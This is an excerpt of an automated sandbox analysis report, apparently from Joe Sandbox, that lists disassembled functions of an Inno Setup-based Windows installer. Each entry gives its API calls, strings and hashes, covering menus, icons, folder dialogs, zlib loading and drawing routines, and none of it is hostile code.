                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004221F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                                                                                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                                                                                                                                                                                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3985193851-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004812DC Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00481499
                                                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004814AD
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(000D023E,00000496,00002710,00000000), ref: 0048151F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • DeinitializeSetup, xrefs: 00481395
                                                                                                                                                                                                                                                                                                                                                                  • GetCustomSetupExitCode, xrefs: 00481339
                                                                                                                                                                                                                                                                                                                                                                  • Restarting Windows., xrefs: 004814FA
                                                                                                                                                                                                                                                                                                                                                                  • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
                                                                                                                                                                                                                                                                                                                                                                  • Deinitializing Setup., xrefs: 004812FA
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeLibrary$MessageNotifySend
                                                                                                                                                                                                                                                                                                                                                                  • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3817813901-1884538726
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fb8259b883485ef9100c7f5c1e95e74d54582b152ce66d5af1bc00326fba4159
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4451A034704240AFD711EB69D895B2E7BE9FB59704F50887BE801C72B1DB38A846CB5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004674EC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                                                                                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
                                                                                                                                                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                                                                                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
                                                                                                                                                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                                                                                                                                                                                                                                                                  • String ID: c:\directory$k H$shell32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3376378930-433663191
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4af67d177e4484d70806344aeaba583e20927e78336b63b08cca65f63aa27719
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 265839c963417482dd86c951db209f81288bb0a388fd09f062db7983cc26d63d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4af67d177e4484d70806344aeaba583e20927e78336b63b08cca65f63aa27719
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2516070604604AFDB10EF69CD89FDFB7E8EB48318F1081A6F9049B391D6399E81CA59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042F570 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F59F
                                                                                                                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0042F5A7
                                                                                                                                                                                                                                                                                                                                                                  • RegisterClassA.USER32(004997AC), ref: 0042F5C8
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
                                                                                                                                                                                                                                                                                                                                                                  • SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: TWindowDisabler-Window
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3167913817-1824977358
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7ee3fb80de1fa46ff8855e30358d0e0393f3e91d59edec71fc45dd55ca6f9eb6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ee3fb80de1fa46ff8855e30358d0e0393f3e91d59edec71fc45dd55ca6f9eb6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004619F8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                                                                                                                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 00461A97
                                                                                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                                                                                                                                                                                                                                                                                                                                  • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                                                                                                                                                                                                                                                                                                                                  • 7712D120.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                                                                                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ActiveWindow$7712BrowseD120FolderInitializeMalloc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3129831556-3554254475
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 91aa1e575359a2533a0b1f7d511e218a3f759194523a1360925dab01496aa42e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91aa1e575359a2533a0b1f7d511e218a3f759194523a1360925dab01496aa42e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00472C68 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                                                                                                                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 884541143-1710247218
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c5c3265b8dd7af47347773660ff2acf40ef0d407e2123e14079c182a1610a84
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c5c3265b8dd7af47347773660ff2acf40ef0d407e2123e14079c182a1610a84
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0045D618 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D621
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D631
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D641
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D651
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-3516654456
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 51387b376403b20f136af879f8535967482cdd16e59757bfc346a7718098ee24
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51387b376403b20f136af879f8535967482cdd16e59757bfc346a7718098ee24
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041A8EC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Color$StretchText
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2984075790-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
